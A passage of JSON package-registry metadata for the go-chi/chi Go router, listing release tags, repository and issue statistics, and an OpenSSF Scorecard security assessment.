null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.090Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":0.42444926529425825,"forks_count":0.6257877057855061,"average":4.348809308704352},"purl":"pkg:golang/gopkg.in/chi.v2","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/gopkg.in/chi.v2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/gopkg.in/chi.v2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/gopkg.in/chi.v2/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v2/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":8259381,"name":"github.com/go-Chi/chi","ecosystem":"go","description":"","homepage":"https://github.com/go-Chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-Chi/chi","keywords_array":[],"namespace":"github.com/go-Chi","versions_count":8,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2023-09-07T09:35:12.000Z","latest_release_number":"v1.5.5","last_synced_at":"2026-08-12T02:06:19.060Z","created_at":"2023-09-11T04:51:07.287Z","updated_at":"2026-08-12T02:06:19.060Z","registry_url":"https://pkg.go.dev/github.com/go-Chi/chi","install_command":"go get github.com/go-Chi/chi","documentation_url":"https://pkg.go.dev/github.com/go-Chi/chi#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1